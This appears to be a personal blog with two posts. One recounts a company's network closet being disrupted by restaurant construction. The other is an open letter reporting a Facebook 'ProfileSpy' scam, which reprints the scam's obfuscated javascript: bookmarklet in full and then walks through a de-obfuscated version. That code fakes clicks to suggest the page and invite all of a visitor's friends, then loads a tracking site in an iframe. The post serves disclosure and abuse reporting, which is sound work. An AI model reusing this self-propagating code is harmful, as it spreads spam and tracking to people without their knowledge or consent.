Adam Katz Musings

What Network Closet?

Tue, 01 Jun 2010 19:19:33 -0500

It all started a few months ago. Our building decided to put a restaurant in downstairs. From my conversations with the head chef (who doubles as the building super), it's going to be a nice restaurant with some fantastic lunch options and a full bar. The problem is that it's being constructed on quite the budget, which means little is done outside of the work day. My office is directly above the construction. Over the last few months, I've had to deal with dying equipment, racket and vibrations at my feet, the moving of my doorway, and oh, the network closet... When you make major upgrades to a building, the grandfathering for various safety codes disappears. This meant some major work on the rest of the building before the restaurant can be started. The second largest impact that had on my company's space was in the sprinkler system that had to be installed. This was the source of many a headache, especially for the systems department I run, as we had to constantly be aware of everything they were doing, especially in the server room with respect to debris from moved ceiling tiles, sprinkler tests, and just the fact that we had to chaperon the pipe workers and make sure they didn't bump anything. As the restaurant was to be below our space, this became the staging area for all of the work. We endured two or so months of hearing them cut the pipes for the system and smelling the oil used to lubricate the saw (it smelled much like the exhaust from an idling car parked too close to an air intake vent). However, the largest impact was to my office: My officemate and I were evicted from our office for a week while they moved the door from one side of a wall in our office to the other. This allowed them to block the end of our corridor (they cut a new hole in another wall to connect the fire escape path so that they could remove the fire door at the end of our hallway, then they shortened it beyond my office's door) to facilitate a new fume vent for the restaurant (which we fully expect to leak and fill my office with the smell of frying food). The patched doorway is uninsulated and features an open drop to the ground floor on its other side, which allows me to hear conversations and construction all day long. The original network closet. The area allotted for the restaurant used to include a large lobby with access to a network closet and adjacent fire stairwell in addition to the repurposed office space. Before the construction, the network closet was a locked closet containing a patch panel for each office in the building and a rack for network switches and T1 gateway (the building and my company each have dedicated lines and another tenant used to have their own as well). One day, when there just happened to be no IT hands (nor the COO, our primary contact with the building management), the closet was reconsolidated into a new space. With no after-hour work, this meant a few hours of down-time for everybody in the complex. I'm told my CEO sat for hours just glaring at the engineer tasked with moving the equipment. This operation left the closet's contents stacked atop a wooden shelf next to the patch panels and punch blocks which had been moved as well, but the process did result in every cord being labeled copiously. Stack of network equipment on a wooden shelf. Due to other issues (probably a mix of heat, dust, and inconsistent power), we've been losing a lot of power supplies on servers and switches in the past year. The stack as pictured was before we lost another switch and then pair of switches to that factor, so by late May, it sported another three switches. (Due to the precarious mess of equipment, it was easier to leave dead equipment in the pile than to remove it.) For the first few days, there was a power strip taped together and dangling from the building's gateway. We have company-wide meetings every Wednesday at noon. On Wednesday May 26, shortly after dialing the conference channel at noon, we lost our phone. A latecomer to the meeting also noted that the network was down. I sent Morgan to take a look at the network … uh, shelf … while I continued to investigate the wiring in the conference room. He saw quite the scene. Well, nothing is shattered on the floor… When Morgan got down to the restaurant area, it was completely empty. The entire shelf's contents were dangling from their cords about four feet from the floor. By the time we got more people downstairs, a few construction workers had returned. They afforded us ladders and let us move things around while I called the building owners. The rest of the day saw things mostly back up and running with most of it in a precarious stack of equipment atop a ladder. A few hours' work, drastically reduced by the labels from the last move, saw most of my company's equipment move into its intended destination in a curiously-hung rack suspended above a door to the fire stairwell. During this process, worker after worker came in and resumed their tasks; nobody wanted blame for what had been done, so they all quickly found other things to do after realizing what had happened. The accident came from either somebody snagging the cables with some piping as they walked by or work being done on the other side of the wall (which was cut open while we were there so as to expose some pipes). Disconnect, lift, untangle, resist rampage. After hours, we moved the rest of the equipment to the rack. You can see the nice and tidy cords in the pictures leading to the items on top while the building and other tenants' wiring is draped across the punch blocks; I ordered extra cables the previous week in anticipation of this move. In fact, I had sweated through the previous day in shoes rather than sandals so that this could be taken care of then, but the rack wasn't ready and I didn't have the time (the building workers got the rack ready directly following the incident). The final piece, which still wasn't ready for the move, is power; our UPS battery is zip-tied to the rack while the building's power strip dangles from its side. The protected outlet is still on the other side of the wooden shelf (note the extension cord in the picture) and there's nowhere to rest our non-rack-mount UPS. The current arrangement. Miraculously, the only lost equipment came in the form of some cables. Even our about-to-die phone exchange server (a no-name commercial Linux VoIP system) survived without issues, though I think its RJ21 connector (a.k.a. 50-pin telco connector or Amphenol connector) may be a bit more fragile now. Needless to say, everybody in the company is eagerly looking forward to a move to better facilities. Some more than others...

ProfileSpy is a scam

Sat, 22 May 2010 16:49:50 -0500

An open letter to Facebook and Blogspot: I am writing about a Facebook page (app?) called "See WhoHas Viewed You" which brands itself as ProfileSpy ("see who views your facebook profile"). The page begins by requesting users click "Like" on the page, after which further instructions follow. The javascript code offered for the service is incredibly obfuscated (I break it down below). Assuming you install it anyway, all visitors to your Facebook profile will automatically do (with no knowledge or consent) all of these items: Suggest the ProfileSpy page, invite all(?) of their friends to use it, and then load the http://profilespy.blogspot.com website in a frame. This site (purposefully not linked here!) includes all of the user-tracking code. It appears to also visit some other pages and submit forms on them so as to be more profitable and potentially collect more of your information. Updated 2010-05-31 . Skip to update . To: abuse@facebook.com, abuse@blogspot.com Cc: info@epic.org, information@eff.org Hello Facebook and (Google) BlogSpot abuse teams. And privacy experts at EFF and EPIC . I am writing about a Facebook page (app?) called " See WhoHas Viewed You " ("ProfileSpy / see who views your facebook profile"). BlogSpot hosts the ProfileSpy site, including all user-tracking and automatic advertisment-traversing aspects. This appears to be in violation of several basic privacy standards. It also looks pretty viral. I have attached a hand-de-obfuscated version of the code it requests users install. Even to get as far as needing the code, you are required to tell FaceBook that you "like" the page (which is either itself prohibited or at least should be). Once installed, visitors to your page will then run this code without their knowledge or consent. This entails: Telling FaceBook that the visitor suggests the page. Inviting all(?) of the visitor's Facebook friends to the page. Loading http://profilespy.blogspot.com in an iframe. The blogspot page appears to be a user-tracking auto-ad-following page (certainly not a blog). The viral propagation and self-promotion performed by the page must have already allowed it to gather an enormous database of user information. Unless I have missed something, both should be shut down immediately. EFF/EPIC: Please add this to the list of problems suffered on Facebook for its failure to deal with this issue; ProfileSpy has been an issue in the past . Here's the code break-down (Note, original code was a single line. I have broken it up and created whitespace where it did not previously exist): javascript:var_0xba64=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x36\x31\x36\x3 5\x35\x34\x39\x35\x32\x36\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D \x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\ x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\ x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\ x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\ x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\ x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x32\x31\x34\x39\x33\ x30\x35\x37\x38\x38\x31\x38\x31\x34\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\ x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\ x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\ x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\ x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74 ","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x 45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E \x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x 65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x6 6\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72 \x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70 \x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x 72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x70\x72\x 6F\x66\x69\x6C\x65\x73\x70\x79\x2E\x62\x6C\x6F\x67\x73\x70\x6F\x74\x2E\x63\x 6F\x6D\x2F\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x 38\x32\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x 78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x 63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61 \x6D\x65\x3E"];var variables=[_0xba64[0],_0xba64[1],_0xba64[2],_0xba64[3],_0xba64[4],_0xba64[5] ,_0xba64[6],_0xba64[7],_0xba64[8],_0xba64[9],_0xba64[10],_0xba64[11],_0xba64 [12],_0xba64[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void(document[variables[2]](variables[1])[variables[0]]=_0xba64[14]); This constructs an array of strings "_0xba64" where each string is assembled through basee64 character codes. It then creates a new array "variables" and assigns all of the first array's elements to it (essentially, it's a copy). The final elemnent is not copied. The actual value of each of those strings is listed below. The fully de-obfuscated code follows it. I'd call this more of a virus than a helpful tool for users. First, it forces all of your visitors to suggest the application to all of their friends. After that, it appears to force your visitors to invite their friends to the application as well. Finally, it phones home by loading the ProfileSpy site in a frame. This site appears to have a bunch of self-submitting ads whichshould be quite profitable to the ProfileSpy developers. It also has a ton of user-tracking elements, some of which get passed onto the user as a 'service.' variables=[ "InnerHTML", // 0 "app6165549526_body", // 1 "getElementById", // 2 '' + 'Suggest to Friends', // 3 "suggest", // 4 "MouseEvents", // 5 "createEvent", // 6 "click", // 7 "initEvent", // 8 "dispatchEvent", // 9 "select_all", // 10 "sgm_invite_form", // 11 "/ajax/social_graph/invite_dialog.php", // 12 "submitDialog", // 13 '' // 14 (not copied to variables[]) ]; Here is the full de-obfuscated code (alternatively, download profilespy.js ): // Locate the element with the ID "app6165549526_body" and set its HTML content // (overwrite) with the following: void (document.getElementById("app6165549526_body").innerHTML = 'Suggest to Friends<'+'/a>'); // assign variable "ss" to the "Suggest to Friends" link added above var ss=document.getElementById("suggest"); // Create a mouse event var c=document.createEvent("MouseEvents"); c.initEvent("click",true,true); // dispatch it to (CLICK) the "suggest" link. void ss.dispatchEvent(c); // the code "fs.select_all()" will run itself in four seconds // ... I don't know what "fs" is. This might select the entire facebook page, // though I suspect it actually selects all options on a form. It probably // opts the user into something that requires user input, which is quite unfair. void setTimeout(function (){fs.select_all(); } ,4000); // wait five seconds and then submit whatever the Social Graph Manager (sgm) is, // which almost certainly uses the selected items from fs.select_all(). // I'd guess this now invites all of each visitor's friends to the app. void setTimeout(function (){ SocialGraphManager.submitDialog( "sgm_invite_form", "/ajax/social_graph/invite_dialog.php"); } ,5000); // Now that we've clicked "Suggest to Friends," we can re-use that space. // Replace that same element's contents with the code for a frame inside which // is the real payload; the profilespy website, which appears chock-full of // user tracking, self-submitting advertising, and other problems. void (document.getElementById("app6165549526_body").innerHTML = ''; Update 2010-05-31: Performing due diligence is apparently hard these days. That's a change from the last time I went about this sort of thing. Abuse emails aren't as useful as they used to be. abuse@facebook.com automatically replies "the email address you are using to reach us is no longer available" and suggests I use the Help Center (which makes me wonder how a non-member can register an abuse issue...). abuse@blogspot.com bounced (with a retry timeout, indicating that they've misconfigured the address to infinitely delay mail!), and abuse@google.com was completely unhelpful (I was referred by an auto-responder to web-based abuse systems at mail.google.com, which is clearly the wrong venue). Even the advocacy groups were problematic, though not for giving me the run-around; EPIC rejected the message due to its .js attachment, and the EFF has not yet responded. Time for another round.